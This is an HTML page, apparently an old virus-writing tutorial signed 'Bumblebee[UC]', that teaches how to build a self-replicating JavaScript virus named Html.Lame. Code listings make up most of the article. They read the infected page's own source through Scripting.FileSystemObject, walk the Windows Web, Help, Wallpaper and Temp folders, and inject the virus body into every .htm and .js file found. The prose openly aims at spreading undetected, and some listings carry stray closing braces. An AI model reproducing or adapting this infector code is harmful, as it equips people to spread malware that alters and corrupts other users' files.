<html>

<head>
<meta http-equiv="Content-Type"
content="text/html; charset=iso-8859-1">
<meta name="GENERATOR" content="Microsoft FrontPage Express 2.0">
<title></title>
</head>

<body background="back.gif">

<p><img src="htmlVirus.gif" align="top" width="244" height="85">by
Bumblebee[UC]</p>

<p><strong>Introduction</strong></p>

<p>Are Html viruses a menace for users? Well this is a question
that most avers make theirselves. Why spend time detecting and
cleaning this 'new' viruses if the user never become infected.
That's right?</p>

<p>In my opinion html viruses are like macro ones, but a macro
virus has all it needs in the program that runs the macro. A html
virus needs an interpreter and other programs to spread. We must
know some concepts before we start coding Html viruses:</p>

<blockquote>
    <dl>
        <dt><b>Automation object</b> </dt>
        <dd>An object that is exposed to other applications or
            programming tools through Automation interfaces.
            Automation servers provide at least one type of
            object. For example, a word-processing application
            may provide an application object, a document object,
            and a toolbar object. This is like some macro viruses
            does their work. Like <em>Melissa</em>, that uses the
            mail client of <em>Microsoft</em> to spread. The most
            important server for us is <em>Scripting</em> that
            has needed objects for spread process, but you can
            call other servers like <em>Word</em>.</dd>
        <dt>&nbsp;</dt>
        <dt><b>JavaScript and/or VBScript and/or WSH</b></dt>
        <dd>These are the most common scripting lenguages used
            over the net and local machines. There are a lot of
            more powerfull lenguages, like <em>TCL/TK, </em>but
            we want the virus to spread, so we need to use the
            most 'spreaded' lenguage. There are a lot of tuts
            over the net. I'm going to show you only the things
            you need to infect Html files. But there are a lot of
            ways to do the same thing. Try to get some of this
            tuts. In <em>Microsoft</em>'s site is <em>JScript
            Lenguage Reference</em> for v4.0 of the lenguage.</dd>
    </dl>
</blockquote>

<p>I'm going to use <strong>JavaScript</strong>. Most Html
viruses i have seen are coded in <strong>VBScript</strong> -yep,
more of them aren't viruses- using <em>WSH</em> as <em>Codebrakers</em>
made with their <em>VBS</em> viruses. The method i'm going to
explain is a basic one. You can improve it using <em>WSH</em> but
is not required.</p>

<p>There are 3 points to solve in Html virus coding:</p>

<ol>
    <li>Find the virus body</li>
    <li>Find files to infect</li>
    <li>Infect files</li>
</ol>

<p>I'm going to explain these three points with a virus made for
this article: <strong>Html.Lame</strong>. Is a little Html virus
coded in <strong>JavaScript</strong> that infects Html and Js
files. Uses only the <em>Scripting</em> server. Has a payload
activated by date and all the virus is about 72 lines of code.</p>

<p>&nbsp;</p>

<p><font color="#000000"><strong>Find the virus body</strong></font></p>

<p>We need a clean copy of the virus body to add to (infect)
other html files. I search the location of the infected file that
contains the virus with:</p>

<pre>virusPath=window.location.pathname</pre>

<p>With this line i have the path of the file in the variable <em>virusPath</em>.
Notice that you must declare <em>virusPath</em> as variable
before use it. Now we need to read the entire infected file. At
this point is required an <em>Automation object</em> from the
server <em>Scripting</em>. We use the function:</p>

<p>var newObject = new <b>ActiveXObject(</b><i>class</i><b>)</b> </p>

<p>The <i>class</i> argument uses the syntax <i>servername.typename</i>
and has these parts: </p>

<table border="1" cellpadding="5" cellspacing="0" width="87%">
    <tr>
        <td valign="top" bgcolor="#DDDDDD"><font size="2"><b>Part</b></font></td>
        <td valign="top" bgcolor="#DDDDDD"><font size="2"><b>Description</b></font></td>
    </tr>
    <tr>
        <td valign="top" bgcolor="#DDDDDD"><font size="2"><i>servername</i></font></td>
        <td valign="top" bgcolor="#DDDDDD"><font size="2">The
        name of the application providing the object.</font></td>
    </tr>
    <tr>
        <td valign="top" bgcolor="#DDDDDD"><font size="2"><i>typename</i></font></td>
        <td valign="top" bgcolor="#DDDDDD"><font size="2">The
        type or class of the object to create.</font></td>
    </tr>
</table>

<p>And we use it in this way:</p>

<pre>fso=ActiveXObject(&quot;Scripting.FileSystemObject&quot;)</pre>

<p>Our virus works only offline 'cause online you can't open the
infected file. Now we need to quit the <strong>/</strong> that is
at the begining of the path (because is a local file), and read
the entire file:</p>

<pre>virusPath=virusPath.slice(1)
file=fso.openTextFile(virusPath,1)
virus=file.readAll()
file.close()
</pre>

<p>We use <em>Slice</em> to quit the first char at <em>virusPath</em>
and <em>fso.openTextFile</em> to open the infected file. With the
next line we read the code and put into the var <em>virus</em>
and finally close the file.</p>

<p>Now we have the entire infected file into a var. Now we need
to get the virus body from the file. We do this with:</p>

<pre>i=virus.search(new RegExp(&quot;&lt;SCRIPT lenguage=\&quot;JavaScript\&quot; lame&gt;&quot;))
j=virus.search(new RegExp(&quot;Lame&quot;+&quot;Ends&quot;))
j+=20
virus=virus.slice(i,j)</pre>

<p>We search the first line of the virus and put the pos of this
string into a var. Next do the same but with the virus end line.
Notice two things:</p>

<blockquote>
    <p>1.We search &quot;Lame&quot;+&quot;Ends&quot; cause we
    don't want our virus founds &quot;LameEnds&quot; before the
    virus ends -shit, this is hard to explain-:</p>
</blockquote>

<pre>... more virus ...
j=virus.search(new RegExp(&quot;Lame&quot;+&quot;Ends&quot;))
... more virus ...
file.close()
}
}
}
//LameEnds--&gt;&lt;/SCRIPT&gt;</pre>

<p>The right &quot;LameEnds&quot; is the second. So we put
&quot;Lame&quot;+&quot;Ends&quot; to avoid find the wrong string.</p>

<blockquote>
    <p>2. We need to add 20 to j 'cause we want &quot;<em>--&gt;&lt;/SCRIPT</em>&gt;&quot;
    as virus body too.</p>
</blockquote>

<p>Now the <em>slice</em> line gets the virus body from the
entire infected file.</p>

<p>&nbsp;</p>

<p><font color="#000000"><strong>Find files to infect</strong></font></p>

<p><font color="#000000">The worst part of a Html virus it to
find files to infect. In Win98 there are lot of Html files but is
hard to find new files for our virus. We can use the following
function to find folders where usually are Hml files:</font></p>

<p><i>object</i>.<b>GetSpecialFolder(</b><i>folderspec</i><b>)</b>
</p>

<p>The <b>GetSpecialFolder</b> method syntax has these parts: </p>

<table border="1" cellpadding="5" cellspacing="0" width="87%">
    <tr>
        <td valign="top" bgcolor="#DDDDDD"><font size="2"><b>Part</b></font></td>
        <td valign="top" bgcolor="#DDDDDD"><font size="2"><b>Description</b></font></td>
    </tr>
    <tr>
        <td valign="top" bgcolor="#DDDDDD"><font size="2"><i>object</i></font></td>
        <td valign="top" bgcolor="#DDDDDD"><font size="2">Required.
        Always the name of a <b>FileSystemObject</b>.</font></td>
    </tr>
    <tr>
        <td valign="top" bgcolor="#DDDDDD"><font size="2"><i>folderspec</i></font></td>
        <td valign="top" bgcolor="#DDDDDD"><font size="2">Required.
        The name of the </font><font color="#000000" size="2">special</font><font
        size="2"> folder to be returned. Can be any of the
        constants shown in the following table.</font></td>
    </tr>
</table>

<p>The <i>folderspec</i> argument can have any of the following
values: </p>

<blockquote>
    <div align="left"><table border="1" cellpadding="5"
    cellspacing="0" width="87%">
        <tr>
            <td valign="top" width="15%" bgcolor="#DDDDDD"><font
            size="2"><b>Constant</b></font></td>
            <td align="middle" valign="top" width="10%"
            bgcolor="#DDDDDD"><font size="2"><b>Value</b></font></td>
            <td valign="top" width="0" bgcolor="#DDDDDD"><font
            size="2"><b>Description</b></font></td>
        </tr>
        <tr>
            <td valign="top" width="15%" bgcolor="#DDDDDD"><font
            size="2"><b>WindowsFolder</b></font></td>
            <td align="middle" valign="top" width="10%"
            bgcolor="#DDDDDD"><font size="2">0</font></td>
            <td valign="top" bgcolor="#DDDDDD"><font size="2">The
            Windows folder contains files installed by the
            Windows operating system.</font></td>
        </tr>
        <tr>
            <td valign="top" width="15%" bgcolor="#DDDDDD"><font
            size="2"><b>SystemFolder</b></font></td>
            <td align="middle" valign="top" width="10%"
            bgcolor="#DDDDDD"><font size="2">1</font></td>
            <td valign="top" bgcolor="#DDDDDD"><font size="2">The
            System folder contains libraries, fonts, and device
            drivers.</font></td>
        </tr>
        <tr>
            <td valign="top" width="15%" bgcolor="#DDDDDD"><font
            size="2"><b>TemporaryFolder</b></font></td>
            <td align="middle" valign="top" width="10%"
            bgcolor="#DDDDDD"><font size="2">2</font></td>
            <td valign="top" bgcolor="#DDDDDD"><font size="2">The
            Temp folder is used to store temporary files. Its
            path is found in the TMP environment variable.</font></td>
        </tr>
    </table>
    </div>
</blockquote>

<p>So we can get Windows and Temporary folders to infect files
there. Morever we can get <em>\windows\web</em> and <em>\windows\web\wallpaper</em>.</p>

<p>Our virus does:</p>

<pre>var winDir=fso.GetSpecialFolder(0)
lameDir(fso.GetFolder(winDir.path+&quot;\\Web&quot;))
lameDir(fso.GetFolder(winDir.path+&quot;\\Help&quot;))
lameDir(fso.GetFolder(winDir.path+&quot;\\Web\\Wallpaper&quot;))
lameDir(fso.GetSpecialFolder(2))</pre>

<p>And <em>lameDir</em> is the function we use to infect all the
files in this folder.</p>

<pre>function lameDir(folder)
{
var files,fitem
files=new Enumerator(folder.files)
for(;!files.atEnd();files.moveNext()) {
        fitem=files.item()
        lameInfect(fitem.path)
}
}
}
}</pre>

<p>We get all the files of the folder passed as argument to the
function. Using the <em>Enumerator</em> object we call <em>lameInfect</em>
function to infect each file found.</p>

<p>&nbsp;</p>

<p><font color="#000000"><strong>Infect files</strong></font></p>

<p><font color="#000000">This is the part we must do in the best
way. If a file is wrong infected can be corrupted and user
notices something goes wrong. The argument of this function is
the path of the fie to infect. First we need to check the
extension of the file 'cause we want infect only Html, Htm and Js
files.</font></p>

<pre><font color="#000000">function lameInfect(fileName)
{
if(fileName.search(new RegExp(&quot;.[hH][tT][mM]&quot;))!=-1 
	|| fileName.search(new RegExp(&quot;.[jJ][sS]&quot;))!=-1) {
var file,fso,host,i,j,infected,virus,virusPath
fso=new ActiveXObject(&quot;Scripting.FileSystemObject&quot;)
virusPath=window.location.pathname
virusPath=virusPath.slice(1)
file=fso.openTextFile(virusPath,1)
virus=file.readAll()
file.close()
i=virus.search(new RegExp(&quot;&lt;SCRIPT lenguage=\&quot;JavaScript\&quot; lame&gt;&quot;))
j=virus.search(new RegExp(&quot;Lame&quot;+&quot;Ends&quot;))
j+=20
virus=virus.slice(i,j)
file=fso.openTextFile(fileName,1)
host=file.readAll()
file.close()
if(host.search(new RegExp(&quot;Html.Lame&quot;))==-1) {
i=host.search(new RegExp(&quot;&lt; *[Bb][Oo][Dd][Yy]&quot;))
if(i!=-1) {
i+=4
infected=host.slice(0,i)
host=host.slice(i)
i=host.search(new RegExp(&quot;&gt;&quot;))
i++
infected+=host.slice(0,i)
host=host.slice(i)
}
infected+=virus
infected+=host
file=fso.openTextFile(fileName,2)
file.write(infected)
file.close()
}
}
}
</font></pre>

<p><font color="#000000">This fuction includes the code to find
virus body, and this is explain yet. See the rest of the code. We
open the future host and read the entire code. Now we search for <em>body</em>
section. If we can't found it we assume it is a Js file and
insert the virus code at the begining of the file.</font></p>

<p><font color="#000000">But if <em>body</em> section is found we
must found the end of this tag. This tag can contain more
sub-tags as <em>bgcolor</em> and <em>background</em>. So we must
find exactly where this section ends. Then we insert the virus
code there. I used <em>slice</em> and <em>search</em>, but you
can use other functions as well.</font></p>

<p><font color="#000000"></font>&nbsp;</p>

<p><font color="#000000"><strong>The end</strong></font></p>

<p><font color="#000000">That's it! I hope this made you a global
idea about Html viruses. Html viruses are lame but can be
interesting combined with other items like macros or file
viruses. The <strong>Html.Lame</strong> is a very basic Html
virus and works fine, the reader can found other ways to infect
as using <em>onLoad</em> tag. Take a look at the code of the
virus. There are some things i didn't commented but you can
understand it your own: testing if the browser is Netscape,
payload, ... Enjoy it!</font></p>

<p align="right"><font color="#000000">Bumblebee[UC] </font></p>
</body>
</html>
